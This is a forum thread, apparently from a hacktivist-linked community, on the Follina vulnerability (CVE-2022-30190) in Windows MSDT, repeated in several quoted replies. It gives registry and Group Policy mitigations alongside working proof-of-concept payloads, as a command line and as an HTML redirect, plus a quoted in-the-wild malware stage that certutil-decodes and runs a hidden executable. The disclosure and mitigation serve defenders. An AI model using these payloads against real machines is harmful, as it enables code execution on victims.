Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!

Alert 0day CVE-2022-30190 follina p0c and fix

This prefix use to attract extra attention from user

impossible1337

Warrant Officer II
DFM Member
Joined
Jan 13, 2022
Messages
203
Reaction score
1,202
DragonCoin
9,660.00
1654239852864.png
P0c Patch / Fix 0day CVE-2022-30190 follina
by : impossible1337

video : https://t.me/dragonforceio/740

#Fix 1 Workarounds
To Disable the MSDT URL Protocol
Payload KEY : ms-msdt:/id PCWDiagnostic
Payload KEY : msdt /id PCWDiagnostic

Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system.
Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters.
Follow these steps to disable:`

1)Run Command Prompt as Administrator.
2) To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdtbak“
3) Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

How to undo the workaround

1)Run Command Prompt as Administrator.
2)To restore the registry key, execute the command “reg import ms-msdtbak”


#Fix 2
A Group Policy mitigation for MSDT element, which is really good and easy to deploy:

0day CVE-2022-30190 "Troubleshooting wizards" by GPO

HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0
Put simply:

Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics Set “Troubleshooting: Allow users to access and run Troubleshooting Wizards” to “disabled”
1654238818213.png
Windows 11 v21H2
Windows 10 v21H2
Windows 10 v21H1
Windows 10 v20H2
Windows 10 v2004
Windows 10 v1909
Windows 10 v1903
Windows 10 v1809
Windows 10 v1803
Windows 7
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019

p0c :
cmd :
msdt /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"

html :
window.location.href = “ms-msdt:/id PCWDiagnostic /skip force /param \”IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(‘calc.exe’))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \””;


Malware Execution​

1654240588657.png
The specific sample showed the following which was hosted on the webserver (xmlformats[.com])

Code:
$cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

MSDT What is it?​

MSDT is a diagnostic tooling set from Microsoft:

Answers questions about the MSDT – SQL Server | Microsoft Docs

msdt | Microsoft Docs

[MS-TPSOD]: Protocol Summary | Microsoft Docs

“Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input.”

Forum Rasmi: https://dragonforce.io
Radio Rasmi: https://radio.dragonforce.io
Facebook: https://fb.me/dragonforcedotio
Telegram: https://t.me/dragonforceio
Twitter: https://twitter.com/dragonforceio
Youtube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw
 

Soul_eater

Corporal
DragonForce Malaysia
Joined
Jan 16, 2022
Messages
119
Reaction score
342
DragonCoin
579,837.00
Fire Red Dragon
P0c Patch / Fix 0day CVE-2022-30190 follina
by : impossible1337

video : https://t.me/dragonforceio/740

Workarounds
To Disable the MSDT URL Protocol
Payload KEY : ms-msdt:/id PCWDiagnostic
Payload KEY : msdt /id PCWDiagnostic

Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system.
Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters.
Follow these steps to disable:`

1)Run Command Prompt as Administrator.
2) To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdtbak“
3) Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

How to undo the workaround

1)Run Command Prompt as Administrator.
2)To restore the registry key, execute the command “reg import ms-msdtbak”


Windows 11 v21H2
Windows 10 v21H2
Windows 10 v21H1
Windows 10 v20H2
Windows 10 v2004
Windows 10 v1909
Windows 10 v1903
Windows 10 v1809
Windows 10 v1803
Windows 7
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019

msdt /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"

Forum Rasmi: https://dragonforce.io
Radio Rasmi: https://radio.dragonforce.io
Facebook: https://fb.me/dragonforcedotio
Telegram: https://t.me/dragonforceio
Twitter: https://twitter.com/dragonforceio
Youtube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw
Tq min 👍
 

Aceofspade

Forum Etiquette & Moderation
DragonForce Malaysia
Joined
May 30, 2021
Messages
5,389
Reaction score
27,590
DragonCoin
1,770,245.00
Dragon Nest (드래곤네스트)
Black Dragon
Fire Red Dragon
Rawr The Fat Tiger
P0c Patch / Fix 0day CVE-2022-30190 follina
by : impossible1337

video : https://t.me/dragonforceio/740

Workarounds
To Disable the MSDT URL Protocol
Payload KEY : ms-msdt:/id PCWDiagnostic
Payload KEY : msdt /id PCWDiagnostic

Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system.
Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters.
Follow these steps to disable:`

1)Run Command Prompt as Administrator.
2) To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdtbak“
3) Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

How to undo the workaround

1)Run Command Prompt as Administrator.
2)To restore the registry key, execute the command “reg import ms-msdtbak”


Windows 11 v21H2
Windows 10 v21H2
Windows 10 v21H1
Windows 10 v20H2
Windows 10 v2004
Windows 10 v1909
Windows 10 v1903
Windows 10 v1809
Windows 10 v1803
Windows 7
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019

msdt /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"

Forum Rasmi: https://dragonforce.io
Radio Rasmi: https://radio.dragonforce.io
Facebook: https://fb.me/dragonforcedotio
Telegram: https://t.me/dragonforceio
Twitter: https://twitter.com/dragonforceio
Youtube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw
Mantap min sharing !!
 

impossible1337

Warrant Officer II
DFM Member
Joined
Jan 13, 2022
Messages
203
Reaction score
1,202
DragonCoin
9,660.00
A Group Policy mitigation for MSDT element, which is really good and easy to deploy:

0day CVE-2022-30190 "Troubleshooting wizards" by GPO

HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0
Put simply:

Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics Set “Troubleshooting: Allow users to access and run Troubleshooting Wizards” to “disabled”

1654238692135.png
 

L4Nr4z89

Warrant Officer II
DFM Member
Joined
Apr 12, 2022
Messages
458
Reaction score
1,192
DragonCoin
22,233.00
P0c Patch / Fix 0day CVE-2022-30190 follina
by : impossible1337

video : https://t.me/dragonforceio/740

#Fix 1 Workarounds
To Disable the MSDT URL Protocol
Payload KEY : ms-msdt:/id PCWDiagnostic
Payload KEY : msdt /id PCWDiagnostic

Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system.
Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters.
Follow these steps to disable:`

1)Run Command Prompt as Administrator.
2) To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdtbak“
3) Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

How to undo the workaround

1)Run Command Prompt as Administrator.
2)To restore the registry key, execute the command “reg import ms-msdtbak”


#Fix 2
A Group Policy mitigation for MSDT element, which is really good and easy to deploy:

0day CVE-2022-30190 "Troubleshooting wizards" by GPO

HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0
Put simply:

Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics Set “Troubleshooting: Allow users to access and run Troubleshooting Wizards” to “disabled”
View attachment 22983
Windows 11 v21H2
Windows 10 v21H2
Windows 10 v21H1
Windows 10 v20H2
Windows 10 v2004
Windows 10 v1909
Windows 10 v1903
Windows 10 v1809
Windows 10 v1803
Windows 7
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019

p0c :
cmd :
msdt /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"

html :
window.location.href = “ms-msdt:/id PCWDiagnostic /skip force /param \”IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(‘calc.exe’))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \””;


Malware Execution​

View attachment 22985
The specific sample showed the following which was hosted on the webserver (xmlformats[.com])

Code:
$cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

MSDT What is it?​

MSDT is a diagnostic tooling set from Microsoft:

Answers questions about the MSDT – SQL Server | Microsoft Docs

msdt | Microsoft Docs

[MS-TPSOD]: Protocol Summary | Microsoft Docs

“Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input.”

Forum Rasmi: https://dragonforce.io
Radio Rasmi: https://radio.dragonforce.io
Facebook: https://fb.me/dragonforcedotio
Telegram: https://t.me/dragonforceio
Twitter: https://twitter.com/dragonforceio
Youtube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw
Waalikumusalam Mantap min..!! Thanks info sharing. 👍🤨
 

Jaring

ᵒᶠᶠᵉᶰˢᶤᵛᵉ Mᵒᵈᵉʳᵃᵗᶤᵒᶰ
DragonForce Malaysia
Joined
Jun 28, 2021
Messages
2,290
Reaction score
10,691
DragonCoin
2,288,669.00
Ulat Gonggok Gergasi
Angry Lion
Mac OS
iOS
Microsoft Windows
P0c Patch / Fix 0day CVE-2022-30190 follina
by : impossible1337

video : https://t.me/dragonforceio/740

#Fix 1 Workarounds
To Disable the MSDT URL Protocol
Payload KEY : ms-msdt:/id PCWDiagnostic
Payload KEY : msdt /id PCWDiagnostic

Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system.
Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters.
Follow these steps to disable:`

1)Run Command Prompt as Administrator.
2) To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdtbak“
3) Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

How to undo the workaround

1)Run Command Prompt as Administrator.
2)To restore the registry key, execute the command “reg import ms-msdtbak”


#Fix 2
A Group Policy mitigation for MSDT element, which is really good and easy to deploy:

0day CVE-2022-30190 "Troubleshooting wizards" by GPO

HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0
Put simply:

Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics Set “Troubleshooting: Allow users to access and run Troubleshooting Wizards” to “disabled”
View attachment 22983
Windows 11 v21H2
Windows 10 v21H2
Windows 10 v21H1
Windows 10 v20H2
Windows 10 v2004
Windows 10 v1909
Windows 10 v1903
Windows 10 v1809
Windows 10 v1803
Windows 7
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019

p0c :
cmd :
msdt /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"

html :
window.location.href = “ms-msdt:/id PCWDiagnostic /skip force /param \”IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(‘calc.exe’))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \””;


Malware Execution​

View attachment 22985
The specific sample showed the following which was hosted on the webserver (xmlformats[.com])

Code:
$cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

MSDT What is it?​

MSDT is a diagnostic tooling set from Microsoft:

Answers questions about the MSDT – SQL Server | Microsoft Docs

msdt | Microsoft Docs

[MS-TPSOD]: Protocol Summary | Microsoft Docs

“Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input.”

Forum Rasmi: https://dragonforce.io
Radio Rasmi: https://radio.dragonforce.io
Facebook: https://fb.me/dragonforcedotio
Telegram: https://t.me/dragonforceio
Twitter: https://twitter.com/dragonforceio
Youtube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw
Tq for sharing min 🤠
 
Top